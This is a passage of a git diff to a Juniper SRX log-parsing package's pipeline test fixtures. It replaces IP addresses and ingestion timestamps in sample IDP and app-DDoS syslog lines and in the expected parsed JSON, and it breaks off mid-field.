roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025497400Z", + "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-13T16:12:05.530Z", "action": "flow_close", diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log index dbbdd8bbf3a..a6c9f8f71b0 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log @@ -1,7 +1,7 @@ -<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="1.128.3.4" source-port="12345" destination-address="175.16.199.1" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="216.160.83.57" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] -<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="1.128.3.4" source-port="12345" destination-address="175.16.199.1" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="216.160.83.57" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] -<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" message-type="SIG" source-address="1.128.3.4" source-port="45610" destination-address="175.16.199.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="216.160.83.57" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] -<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" message-type="SIG" source-address="1.128.3.4" source-port="45610" destination-address="175.16.199.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="216.160.83.57" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] -<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="175.16.199.1" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"] -<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="1.128.3.4" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="175.16.199.1" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] -<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="1.128.3.4" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="175.16.199.1" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] +<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="67.43.156.13" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="67.43.156.15" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] +<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="67.43.156.13" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="67.43.156.15" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] +<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1507845354" message-type="SIG" source-address="67.43.156.14" source-port="45610" destination-address="67.43.156.14" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] +<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1507845354" message-type="SIG" source-address="67.43.156.14" source-port="45610" destination-address="67.43.156.14" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] +<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"] +<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] +<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log-expected.json index 1b7e7e00b8b..e7d9267de68 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log-expected.json +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log-expected.json @@ -8,7 +8,7 @@ "port": 123, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "notification" @@ -16,12 +16,12 @@ "destination": { "nat": { "port": 9757, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "port": 123, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "rule": { "name": "IPS", @@ -38,7 +38,7 @@ }, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "10.11.11.1" }, "juniper": { "srx": { @@ -93,10 +93,10 @@ "unknown-user" ], "ip": [ - "1.128.3.4", - "175.16.199.1", + "10.11.11.1", + "67.43.156.13", "0.0.0.0", - "216.160.83.57" + "67.43.156.15" ] }, "client": { @@ -106,13 +106,13 @@ "port": 12345, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "10.11.11.1" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-11-25T09:37:26.894198951Z", - "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"1.128.3.4\" source-port=\"12345\" destination-address=\"175.16.199.1\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", + "ingested": "2021-12-09T13:40:54.976980500Z", + "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.13\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.193Z", "action": "security_threat", @@ -137,7 +137,7 @@ "port": 123, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "notification" @@ -145,12 +145,12 @@ "destination": { "nat": { "port": 9757, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "port": 123, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "rule": { "name": "IPS", @@ -167,7 +167,7 @@ }, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "10.11.11.1" }, "juniper": { "srx": { @@ -222,10 +222,10 @@ "unknown-user" ], "ip": [ - "1.128.3.4", - "175.16.199.1", + "10.11.11.1", + "67.43.156.13", "0.0.0.0", - "216.160.83.57" + "67.43.156.15" ] }, "client": { @@ -235,13 +235,13 @@ "port": 12345, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "10.11.11.1" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-11-25T09:37:26.894216604Z", - "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"1.128.3.4\" source-port=\"12345\" destination-address=\"175.16.199.1\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", + "ingested": "2021-12-09T13:40:54.976990100Z", + "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.13\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.197Z", "action": "security_threat", @@ -266,7 +266,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "notification" @@ -274,12 +274,12 @@ "destination": { "nat": { "port": 0, - "ip": "216.160.83.57" + "ip": "172.19.13.11" }, "port": 80, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "IPS", @@ -293,7 +293,7 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -343,10 +343,9 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1", + "67.43.156.14", "0.0.0.0", - "216.160.83.57" + "172.19.13.11" ] }, "client": { @@ -356,13 +355,13 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-11-25T09:37:26.894220762Z", - "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"1.128.3.4\" source-port=\"45610\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", + "ingested": "2021-12-09T13:40:54.976996500Z", + "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.19.13.11\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2007-02-15T09:17:15.719Z", "action": "security_threat", @@ -387,7 +386,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "notification" @@ -395,12 +394,12 @@ "destination": { "nat": { "port": 0, - "ip": "216.160.83.57" + "ip": "172.16.1.10" }, "port": 80, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "IPS", @@ -414,7 +413,7 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -464,10 +463,9 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1", + "67.43.156.14", "0.0.0.0", - "216.160.83.57" + "172.16.1.10" ] }, "client": { @@ -477,13 +475,13 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-11-25T09:37:26.894224138Z", - "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"1.128.3.4\" source-port=\"45610\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", + "ingested": "2021-12-09T13:40:54.977002300Z", + "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.16.1.10\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2017-10-12T21:55:55.792Z", "action": "security_threat", @@ -503,14 +501,14 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.27.14.203" }, "log": { "level": "notification" }, "destination": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.27.14.203" }, "rule": { "name": "DDOS", @@ -552,13 +550,13 @@ }, "related": { "ip": [ - "175.16.199.1" + "172.27.14.203" ] }, "event": { "severity": 165, - "ingested": "2021-11-25T09:37:26.894227365Z", - "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]", + "ingested": "2021-12-09T13:40:54.977008100Z", + "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", "category": [ @@ -576,21 +574,21 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.27.14.203" }, "log": { "level": "notification" }, "destination": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.27.14.203" }, "rule": { "id": "1" }, "source": { "port": 50825, - "ip": "1.128.3.4" + "ip": "192.168.14.214" }, "juniper": { "srx": { @@ -643,18 +641,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.14.214", + "172.27.14.203" ] }, "client": { "port": 50825, - "ip": "1.128.3.4" + "ip": "192.168.14.214" }, "event": { "severity": 165, - "ingested": "2021-11-25T09:37:26.894230410Z", - "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"1.128.3.4\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", + "ingested": 